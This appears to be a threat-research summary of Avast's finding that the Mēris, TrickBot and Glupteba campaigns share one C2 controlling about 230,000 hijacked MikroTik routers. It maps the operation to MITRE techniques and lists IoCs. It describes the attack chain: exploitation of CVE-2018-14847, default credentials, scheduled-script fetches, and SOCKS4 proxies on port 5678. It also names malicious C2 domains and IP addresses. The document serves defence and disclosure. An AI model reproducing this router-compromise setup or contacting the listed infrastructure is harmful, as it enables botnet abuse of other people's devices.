Threat Research

Mēris and TrickBot standing on the shoulders of giants – Avast Threat Labs

Securonix

Avast Threat Labs connects Meris, TrickBot, and Glupteba campaigns to a single C2 that covertly controls roughly 230,000 MikroTik routers in a botnet-as-a-service. The research traces exploitation of CVE-2018-14847, widespread use of default credentials, and proxy-based operations to cryptomining, DDoS, and TrickBot activity behind Cloudflare-protected domains. #Meris #MikroTik

Keypoints

  • Researchers link Meris botnet, Glupteba, TrickBot, and related cryptomining/DDoS activity to a single C2 server controlling ~230K MikroTik routers, suggesting a botnet-as-a-service model.
  • CVE-2018-14847 and default credentials enabled broad compromise of MikroTik devices, often left unpatched and exposed on the internet.
  • A honeypot exposed to the internet showed login attempts within 15 minutes, with initial fetches targeting domains like bestony.club and Cloudflare-hidden hosts.
  • The attackers used a multi-stage script chain: a first-stage fetch then second-stage payloads, frequently re-pointing to domains behind Cloudflare with a common GUID across stages.
  • The operation hardened routers by closing management interfaces except SSH/WinBox and enabling a SOCKS4 proxy on port 5678, creating a stealthy proxy network for malicious traffic.
  • Meris/DDoS evidence ties to Yandex and other targets; the C2 servers and domains observed in this operation overlap with previously reported campaigns, suggesting shared infrastructure.
  • TrickBot activity shows MikroTik NAT-based traffic relaying to hidden C2s, with LigoWave devices also implicated via default credentials and proxy configurations; the IoCs point to a broad, IoT-focused proxy-based botnet ecosystem.
  • Defensive guidance emphasizes updating MikroTik devices, removing public-facing admin interfaces, inspecting NAT rules, and reviewing user accounts to disrupt this botnet ecosystem.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability CVE-2018-14847 allowed attackers to bypass authentication on MikroTik routers. ‘the CVE described above … bypass authentication on the routers.’
  • [T1105] Ingress Tool Transfer – The first fetch after infection attempted to fetch additional scripts from other domains. ‘The first fetch that happened after the attacker got inside went to: bestony.club’
  • [T1053] Scheduled Task – The attacker overwrote and renamed scheduled scripts (U3..U7) and set tasks to repeatedly import fetched scripts. ‘overwrite and rename all existing scheduled scripts named U3, U4..U7 and set scheduled tasks to repeatedly import script’
  • [T1090] Proxy – The router enables a SOCKS4 proxy server on port 5678, effectively turning the device into a proxy for malicious traffic. ‘enables the SOCKS4 proxy server on port 5678.’
  • [T1036] Masquerading – Masquerade rules were used to allow the hidden C2 to access the internet through the router. ‘masquerade rules used to allow the hidden C2 to access the internet through the router’
  • [T1078] Valid Accounts – Default credentials and exposed admin accounts facilitated initial access. ‘default credentials … exposed on the internet.’
  • [T1071.001] Web Protocols – Communications with the C2 occurred via HTTP requests, including URLs like http://[domainname]/poll/[GUID]. ‘The URLs had the same format: http://[domainname]/poll/[GUID]’
  • [T1496] Resource Hijacking – Crypto mining campaigns leveraged MikroTik routers to inject mining scripts and mine via compromised devices. ‘crypto mining malware cleverly setting up the router … to inject crypto mining JavaScript …’
  • [T1499] Denial of Service – The Mēris botnet carried out large-scale DDoS attacks against Yandex and other targets. ‘one of the most significant DDoS attacks against Yandex, the biggest search engine in Russia’

Indicators of Compromise

  • [IP Address] Main C2 host and TrickBot proxies – 116.202.93.14, 31.14.40.116
  • [Domain] C2 domains used in the campaigns – bestony.club, tik.anyget.ru
  • [SHA-256] Glupteba ARM32 proxy sample – a0b07c09e5785098e6b660f93097f931a60b710e1cf16ac554f10476084bffcb
  • [VPN Domain] VPN servers used for proxying – s[xx].leappoach.info, s[xx].eeongous.com
  • [Domain] Additional C2 domains associated with the infrastructure – globalmoby.xyz, massgames.space

Read more: https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/